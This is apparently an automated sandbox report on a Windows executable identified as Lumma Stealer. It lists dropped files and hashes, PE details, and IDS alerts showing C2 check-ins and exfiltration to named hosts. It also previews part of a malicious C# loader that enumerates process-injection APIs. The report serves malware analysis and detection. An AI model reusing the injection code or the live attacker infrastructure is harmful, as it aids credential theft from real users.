Preview:	L.....,g.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........T....c:\Users\user\AppData\Local\Temp\qh4rltex\CSCE36AEDAA1DED41D2AE2F4E1F8F6B418.TMP................o....2"4.n..7..........5.......C:\Users\user\AppData\Local\Temp\RES267D.tmp.-.<....................a..Microsoft (R) CVTRES._.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.h.4.r.l.t.e.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmr3gpqi.uqi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pb1fzgt2.3ek.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\qh4rltex\CSCE36AEDAA1DED41D2AE2F4E1F8F6B418.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0906852296362803
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryfYak7YnqqSNPN5Dlq5J:+RI+ycuZhN+akS2PNnqX
MD5:	CEBA6F181FEB19322234B36EC8828237
SHA1:	9B12FEF0311B900F07817130F92E738C957D2F5C
SHA-256:	58E2766BD83CF9FD353D92382D20A7B3F1AF2D4F2A9021AAFC9B3AC1439928D7
SHA-512:	1F015F1636355940BCC84E4B058DDD4BF5FAA42D902BB393409757BD0A547E7A26731E006E8B9EA59C14AD400E7460EBB4C5A91E6F7335E10DB90A318822CB2F
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.h.4.r.l.t.e.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.h.4.r.l.t.e.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	10583
Entropy (8bit):	4.487855797297623
Encrypted:	false
SSDEEP:	192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
MD5:	B022C6FE4494666C8337A975D175C726
SHA1:	8197D4A993E7547D19D7B067B4D28EBE48329793
SHA-256:	D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
SHA-512:	DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
Malicious:	true
Preview:	.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	206
Entropy (8bit):	4.973421176531178
Encrypted:	false
SSDEEP:	6:pAu+H2L/6K2CN23fUvRJzxszICN23fUvR0:p37L/6KmMvRJNMvR0
MD5:	833C703A20DD1567D05F3207FEC34356
SHA1:	45D3AC2BEA2EC405EC738E42F3C9138EB136851F
SHA-256:	60C4AF82E652462F924EA7AAD3B0D580A36B5B5E55045627C5CFCC7AF612A2EB
SHA-512:	F0CAE768E5ACDE72636F7DBBCE4114B1857F37BBD4079BD0F817724D423F87D7B1C1CE9C370BD87C49F09AA599098E1D500102CC85356A4392AF94FB36B710CE
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.0.cs"

C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	4.661136452774683
Encrypted:	false
SSDEEP:	96:CbuaQZGQf9xPQ2pCa/u67hHJ09IhbpPrjzKcaEZRcH0ljILHqrv5Mq6TTzeNc+iZ:CCaQHf9WDa/u6NRj2caXUxd5MqMeNcd
MD5:	139A47B3FFBDC96404BE71BB5D1A9862
SHA1:	C5E9B4846270200668AC4249EC6036F7D5597636
SHA-256:	707885AFAC0EB28489B87DBE3159A43749BFDC94720D745EC997832F4CA02692
SHA-512:	9EB1C21A5FCD9503F2C5158D4EB61596FD328551C1A0EC6FF1650D164E2C282897E22B00F0610F037B59EC613EAD1EB578BC995F24A778F7EE0F27A8109CAFDA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,g...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(...."..(......(.......0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p.....(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......

C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	707
Entropy (8bit):	5.238510208317859
Encrypted:	false
SSDEEP:	12:Kg/IR37L/6KmMvRJNMvRBKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KSIdn6KmMdMLKax5DqBVKVrdFAMBJTH
MD5:	9EE1B34B7BA93604E97A4DEB7050C14E
SHA1:	54ABE6DB2F22085E6F2D000317C0994B6A3F037E
SHA-256:	57590C93D428D89D1FA6685FC3B6353A1AB6F7931E484385EB3AB5AFCF4C4DA6
SHA-512:	92A9446E684237ECCB16DB728CD0AC7BD3605FC96222D117BE4C3763AEFDC6E4588E35FB5C5DEA1144FD51F531C03E558F9D1890E797A248C7FA2D4F45B702D4
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Chrome Cache Entry: 71

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (810)
Category:	downloaded
Size (bytes):	815
Entropy (8bit):	5.164686503043141
Encrypted:	false
SSDEEP:	24:hyJaME9VBHslgT1d1uawBuoBN2t2t2t2t2t2t2tomffffffo:h5MAVKlgJXwBuSNYYYYYYYomffffffo
MD5:	DBF64638654788F697F5074BEB269CBD
SHA1:	B4650D26513FC30E4C8E125133DCBB08E461B5FF
SHA-256:	2150EA1185789F2A99EED5FD80427CD4C10D620F14609858A7167FC67458B02D
SHA-512:	43AFD67EA2B859B1E7D5C57B583446F66924793B7A26317A4B017089BF25F24157F961D7FBFE18BDEFC8750AADB63291EE992C88838F96B21855180F30579AFA
Malicious:	false
URL:	https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
Preview:	)]}'.["",["delta flight atlanta","buffalo bills keon coleman injury","deals black friday","chicago pd season 12","spacex launch","denver weather forecast snow totals","warriors vs celtics nba","mega millions winning numbers"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChoIkk4SFQoRVHJlbmRpbmcgc2VhcmNoZXMoCg\u003d\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308],[3,143,362,308]],"google:suggesttype":["QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY","QUERY"]}]

Chrome Cache Entry: 72

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	downloaded
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:VQAOx/1n:VQAOd1n
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
URL:	https://www.google.com/async/newtab_promos
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 73

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	downloaded
Size (bytes):	134075
Entropy (8bit):	5.4352986654014135
Encrypted:	false
SSDEEP:	1536:i7C/VNgN7Yp+GhGLhJgJoamyeX43zGiJsKtPLx8OF97f4qlgdCFlOve2dzAcJ82O:fE7vhSJjxeX431PBLx8OF9jfYsci2i6o
MD5:	AE04E2B18FF259CE3FDE85494FBA6367
SHA1:	809D8F449E9484C4A0D0BE472D8E6DB0B658E3CF
SHA-256:	4E8CEA7525FBB711989F8324E8D9834FD263DFB35C7ED18BC97DE5EDBF138DBF
SHA-512:	C1F3A9418EE0B73280F59FDB622AEF295EACE0C438F69362E934D25E3CB47F659E7F9CB259D6B000C846D01A08CB355797D4BF1A5D45D264A01B3413E4518AA1
Malicious:	false
URL:	https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.0688434230319475
TrID:	Win64 Executable Console (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	7IXl1M9JGV.exe
File size:	122'368 bytes
MD5:	826ac9d03e37048df300b013335098d9
SHA1:	a1c6214e85b826b769d931a20434224e42da28c1
SHA256:	a0aeb837cb5e762fc0b7d657c71d343e765cccb5780cd315756f682418b3cdfe
SHA512:	60a4d7c9d1628040bdd08b01682cd5900c06f6b23a73877a4b60e3ef983733a5d27a33159306564f014269ba2984fe369e11ac86c27b0fe3906716f4bc187882
SSDEEP:	3072:ORIhf/ay4MQGyEDmGg9m5mZcErtLk0m/USg:vhf/ay4MQGAm5mZHV3b
TLSH:	53C36B1B73A530F8E1674238C8510A46EBB3B43647619FAF03B447A61F636D19E3EB61
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e..n.W.n.W.n.W...V.n.W...VGn.W...V.n.W.n.W.n.W...V.n.W...V.n.W...V.n.W...V.n.W.n.W.n.W...V.n.W...W.n.W...V.n.WRich.n.W.......

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x1400012b0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x672BB597 [Wed Nov 6 18:29:43 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	398697f041e256fb6c451f1966f76316

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F80B0CE7D8Ch
dec eax
add esp, 28h
jmp 00007F80B0CE7717h
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
xor ecx, ecx
call dword ptr [00011D4Bh]
dec eax
mov ecx, ebx
call dword ptr [00011D3Ah]
call dword ptr [00011D44h]
dec eax
mov ecx, eax
mov edx, C0000409h
dec eax
add esp, 20h
pop ebx
dec eax
jmp dword ptr [00011D38h]
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 38h
mov ecx, 00000017h
call dword ptr [00011D2Ch]
test eax, eax
je 00007F80B0CE78A9h
mov ecx, 00000002h
int 29h
dec eax
lea ecx, dword ptr [0001C822h]
call 00007F80B0CE7A6Eh
dec eax
mov eax, dword ptr [esp+38h]
dec eax
mov dword ptr [0001C909h], eax
dec eax
lea eax, dword ptr [esp+38h]
dec eax
add eax, 08h
dec eax
mov dword ptr [0001C899h], eax
dec eax
mov eax, dword ptr [0001C8F2h]
dec eax
mov dword ptr [0001C763h], eax
dec eax
mov eax, dword ptr [esp+40h]
dec eax
mov dword ptr [0001C867h], eax
mov dword ptr [0001C73Dh], C0000409h
mov dword ptr [0001C737h], 00000001h
mov dword ptr [0001C741h], 00000001h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1c31c	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x22000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x1f000	0x1134	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x23000	0x65c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1aab0	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1a970	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x13000	0x270	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x11250	0x11400	a559ce6dfe163c5e10460fac91f9759b	False	0.5678215579710145	data	6.4856742058874035	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x13000	0x9b60	0x9c00	1590a5eb5cd320a7814783eb5f5e6c9d	False	0.42988782051282054	COM executable for DOS	4.751431432298678	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1d000	0x1c60	0xc00	e9fd917697ef433eea404b46e3894240	False	0.1318359375	data	1.8849595949470401	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x1f000	0x1134	0x1200	b2b2c9c449210d103cd9f87cd55b23e0	False	0.4661458333333333	data	4.767539707318678	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x21000	0x1f4	0x200	6d7220769bbd28530d55aa381ab72e09	False	0.49609375	data	3.6079009392606953	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x22000	0x1e0	0x200	f754adbd7f5d6195fd6d527001cab98c	False	0.525390625	data	4.704363013479242	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x23000	0x65c	0x800	f46401db6fb168b3e0ca8cc9c06a3278	False	0.50927734375	data	4.885196292837239	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x22060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL

Import

KERNEL32.dll

RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, RtlPcToFileHeader, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapFree, CloseHandle, WaitForSingleObject, GetExitCodeProcess, CreateProcessW, GetFileAttributesExW, HeapAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetFileType, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CreateFileW, WriteConsoleW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-07T17:55:11.639670+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.11.20	49710	147.45.44.131	80	TCP
2024-11-07T17:55:12.108473+0100	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	192.168.11.20	49710	147.45.44.131	80	TCP
2024-11-07T17:55:12.109154+0100	2800029	ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass	1	147.45.44.131	80	192.168.11.20	49710	TCP
2024-11-07T17:55:13.869866+0100	2057284	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (knifedxejsu .cyou)	1	192.168.11.20	51454	1.1.1.1	53	UDP
2024-11-07T17:55:14.245210+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.11.20	49711	104.21.19.177	443	TCP
2024-11-07T17:55:14.245210+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49711	104.21.19.177	443	TCP
2024-11-07T17:55:14.746759+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.11.20	49711	104.21.19.177	443	TCP
2024-11-07T17:55:14.746759+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49711	104.21.19.177	443	TCP
2024-11-07T17:55:15.081146+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.11.20	49712	104.21.19.177	443	TCP
2024-11-07T17:55:15.081146+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49712	104.21.19.177	443	TCP
2024-11-07T17:55:15.923601+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.11.20	49712	104.21.19.177	443	TCP
2024-11-07T17:55:15.923601+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49712	104.21.19.177	443	TCP
2024-11-07T17:55:21.478914+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.11.20	49720	104.21.19.177	443	TCP
2024-11-07T17:55:21.478914+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49720	104.21.19.177	443	TCP
2024-11-07T17:55:22.553138+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.11.20	49724	104.21.19.177	443	TCP
2024-11-07T17:55:22.553138+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49724	104.21.19.177	443	TCP
2024-11-07T17:55:23.297760+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.11.20	49725	104.21.19.177	443	TCP
2024-11-07T17:55:23.297760+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49725	104.21.19.177	443	TCP
2024-11-07T17:55:24.379486+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.11.20	49727	104.21.19.177	443	TCP
2024-11-07T17:55:24.379486+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49727	104.21.19.177	443	TCP
2024-11-07T17:55:25.581150+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.11.20	49728	104.21.19.177	443	TCP
2024-11-07T17:55:25.581150+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49728	104.21.19.177	443	TCP
2024-11-07T17:55:26.470376+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.11.20	49729	104.21.19.177	443	TCP
2024-11-07T17:55:26.470376+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49729	104.21.19.177	443	TCP
2024-11-07T17:55:27.930071+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.11.20	49729	104.21.19.177	443	TCP
2024-11-07T17:55:28.150953+0100	2057285	ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)	1	192.168.11.20	49730	104.21.19.177	443	TCP
2024-11-07T17:55:28.150953+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.11.20	49730	104.21.19.177	443	TCP
2024-11-07T17:55:28.686722+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49730	104.21.19.177	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 7, 2024 17:55:10.312341928 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:10.498539925 CET	80	49710	147.45.44.131	192.168.11.20
Nov 7, 2024 17:55:10.498759985 CET	49710	80	192.168.11.20	147.45.44.131
Nov 7, 2024 17:55:10.517822027 CET	49710	80	192.168.11.20	147.45.44.131
